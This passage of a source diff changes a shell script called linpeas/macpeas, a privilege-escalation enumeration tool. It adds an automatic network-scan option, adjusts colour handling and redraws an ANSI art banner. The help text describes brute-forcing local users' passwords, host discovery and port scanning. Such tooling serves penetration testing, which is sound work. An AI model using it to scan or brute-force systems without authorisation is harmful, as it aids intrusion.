>/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")" [ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2 -[ -n "$THREADS" ] && eTHREADS="2" #If THREADS is null, put number 2 +[ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2 [ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #It THREADS is not a number, put number 2 HELP=$GREEN"Enumerate and search Privilege Escalation vectors. ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors. @@ -78,9 +83,10 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW}-d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 ${YELLOW}-p -d ${BLUE} Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139 ${YELLOW}-i [-p ]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 + ${YELLOW}-t${BLUE} Automatic network scan (host discovery and port scanning) - This option writes to files $GREEN Notice${BLUE} that if you select some network action, no PE check will be performed$NC" -while getopts "h?asnd:p:i:P:qo:LMwNv" opt; do +while getopts "h?asnd:p:i:P:qo:LMwNvt" opt; do case "$opt" in h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;; a) FAST="";; @@ -97,6 +103,7 @@ while getopts "h?asnd:p:i:P:qo:LMwNv" opt; do w) WAIT=1;; N) NOCOLOR="1";; v) VERBOSE="1";; + t) AUTO_NETWORK_SCAN="1";; esac done @@ -104,19 +111,23 @@ if [ "$MACPEAS" ]; then SCRIPTNAME="macpeas"; else SCRIPTNAME="linpeas"; fi if [ "$NOCOLOR" ]; then C="" RED="" - SED_RED="" + SED_RED="&" GREEN="" - SED_GREEN="" + SED_GREEN="&" YELLOW="" - SED_YELLOW="" - SED_RED_YELLOW="" + SED_YELLOW="&" + SED_RED_YELLOW="&" BLUE="" - SED_BLUE="" + SED_BLUE="&" ITALIC_BLUE="" + LIGHT_MAGENTA="" + SED_LIGHT_MAGENTA="&" + LIGHT_CYAN="" + SED_LIGHT_CYAN="&" LG="" - SED_LG="" + SED_LG="&" DG="" - SED_DG="" + SED_DG="&" NC="" UNDERLINED="" ITALIC="" @@ -129,100 +140,111 @@ fi print_banner(){ if [ "$MACPEAS" ]; then - bash -c "printf ' - \e[38;5;238;48;5;238m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;71m▓\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▓\e[38;5;119;48;5;71m▓\e[38;5;119;48;5;71m▓\e[38;5;119;48;5;71m \e[38;5;119;48;5;71m \e[38;5;119;48;5;71m \e[38;5;119;48;5;71m░\e[38;5;119;48;5;71m \e[38;5;119;48;5;71m \e[38;5;119;48;5;71m \e[38;5;119;48;5;71m\e[38;5;119;48;5;71m\e[38;5;119;48;5;71m▓\e[38;5;119;48;5;71m \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;239m▓\e[38;5;16;48;5;16m▓\e[38;5;244;48;5;244m▓\e[0m - \e[38;5;96;48;5;243m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;235m▒\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;22m \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;22m \e[38;5;22;48;5;232m \e[38;5;16;48;5;16m▓\e[38;5;22;48;5;16m \e[38;5;119;48;5;22m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;234m░\e[38;5;16;48;5;16m▓\e[38;5;96;48;5;245m▓\e[0m - \e[38;5;96;48;5;234m▓\e[38;5;22;48;5;16m \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;22;48;5;16m \e[38;5;22;48;5;16m \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;2m \e[38;5;119;48;5;22m \e[38;5;119;48;5;22m \e[38;5;119;48;5;22m \e[38;5;119;48;5;22m \e[38;5;119;48;5;22m \e[38;5;119;48;5;2m \e[38;5;119;48;5;28m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;40m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;34m░\e[38;5;22;48;5;232m \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;237m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;235m▒\e[38;5;16;48;5;16m▓\e[0m - \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;65m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;238m▒\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;239m▓\e[38;5;119;48;5;7m▓\e[38;5;230;48;5;231m \e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;101;48;5;254m▓\e[38;5;97;48;5;243m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;82;48;5;248m▓\e[38;5;119;48;5;238m▓\e[38;5;71;48;5;233m▒\e[38;5;119;48;5;22m \e[38;5;119;48;5;34m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;34m░\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;232m░\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m - \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;65m▒\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;151m▒\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;252;48;5;252m▓\e[38;5;251;48;5;251m▓\e[38;5;231;48;5;231m▓\e[38;5;239;48;5;239m▓\e[38;5;246;48;5;246m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;119;48;5;255m▒\e[38;5;119;48;5;59m▓\e[38;5;22;48;5;16m \e[38;5;16;48;5;16m \e[38;5;16;48;5;16m░\e[38;5;16;48;5;16m \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m - \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;22;48;5;232m \e[38;5;119;48;5;245m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;243;48;5;242m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;255;48;5;255m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;151;48;5;255m▒\e[38;5;113;48;5;242m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;233m░\e[38;5;119;48;5;64m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m - \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;65m▒\e[38;5;114;48;5;16m▒\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;233;48;5;233m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;119;48;5;237m▓\e[38;5;22;48;5;232m \e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[0m - \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;22m▒\e[38;5;60;48;5;240m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;240;48;5;240m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;145;48;5;248m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;119;48;5;240m▓\e[38;5;119;48;5;235m▒\e[38;5;119;48;5;235m▒\e[0m - \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;252m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;238;48;5;238m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;255;48;5;255m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;119;48;5;233m▒\e[38;5;119;48;5;236m▒\e[0m - \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;232m▒\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;82;48;5;231m \e[38;5;108;48;5;255m▓\e[38;5;119;48;5;188m▓\e[38;5;119;48;5;251m▓\e[38;5;119;48;5;253m▓\e[38;5;65;48;5;255m▓\e[38;5;65;48;5;231m▓\e[38;5;230;48;5;231m \e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;65;48;5;248m▓\e[38;5;119;48;5;233m░\e[0m - \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;150m▒\e[38;5;128;48;5;254m▓\e[38;5;65;48;5;242m▓\e[38;5;119;48;5;237m▓\e[38;5;119;48;5;22m \e[38;5;119;48;5;2m \e[38;5;119;48;5;34m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;28m \e[38;5;22;48;5;22m \e[38;5;119;48;5;234m░\e[38;5;119;48;5;235m▓\e[38;5;65;48;5;238m▓\e[38;5;119;48;5;245m▓\e[38;5;119;48;5;254m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;119;48;5;233m▓\e[0m - \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;28m \e[38;5;119;48;5;22m \e[38;5;76;48;5;233m▓\e[38;5;119;48;5;238m▓\e[38;5;119;48;5;151m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;246;48;5;246m▓\e[0m - \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;28m \e[38;5;22;48;5;232m \e[38;5;119;48;5;237m▓\e[38;5;113;48;5;251m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[0m - \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;22m \e[38;5;22;48;5;16m \e[38;5;22;48;5;16m \e[0m - \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;28m░\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;2m 